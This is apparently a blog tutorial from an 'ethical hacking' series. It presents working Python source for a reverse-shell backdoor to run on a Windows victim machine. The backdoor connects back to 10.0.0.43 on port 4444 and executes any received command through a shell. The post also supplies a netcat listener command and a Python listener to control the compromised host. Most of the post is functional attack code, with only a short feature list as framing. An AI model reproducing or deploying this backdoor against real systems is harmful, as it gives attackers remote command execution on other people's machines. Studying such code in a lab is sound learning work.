REVERSE_BACKDOOR

  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.

BACKDOORS

An interactive program gives access to a system its executed on.

  • Command execution.
  • Access file system.
  • Upload/download files.
  • Run keylogger.
  • ...etc

Python Ethical Hacking - BACKDOORS(1)_linux

 

 

 Python Ethical Hacking - BACKDOORS(1)_linux_02

 

 

 Python Ethical Hacking - BACKDOORS(1)_python_03

 

 

 Write the Reverse backdoor Python script and execute on Windows machine. (Victim machine)

#!/usr/bin/env python
import socket
import subprocess


def execute_system_command(command):
    return subprocess.check_output(command, shell=True)


connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("10.0.0.43", 4444))

connection.send(b"\n[+] Connection established.\n")

while True:
    command = connection.recv(1024).decode()
    command_result = execute_system_command(command)
    connection.send(command_result)

connection.close()

 

Run the listening progress on the Kali Linux to establish the connection and execute the system commands.

nc -vv -l -p 4444

Python Ethical Hacking - BACKDOORS(1)_Hacking_04

 

Write and execute the Python Listener:

#!/usr/bin/env python
import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("10.0.0.43", 4444))
listener.listen(0)
print("[+] Waiting for incoming connections")
connection, address = listener.accept()
print("[+] Got a connection from " + str(address))

while True:
    command = input(">> ").encode()
    connection.send(command)
    result = connection.recv(1024).decode()
    print(result)

Python Ethical Hacking - BACKDOORS(1)_linux_05

 

相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。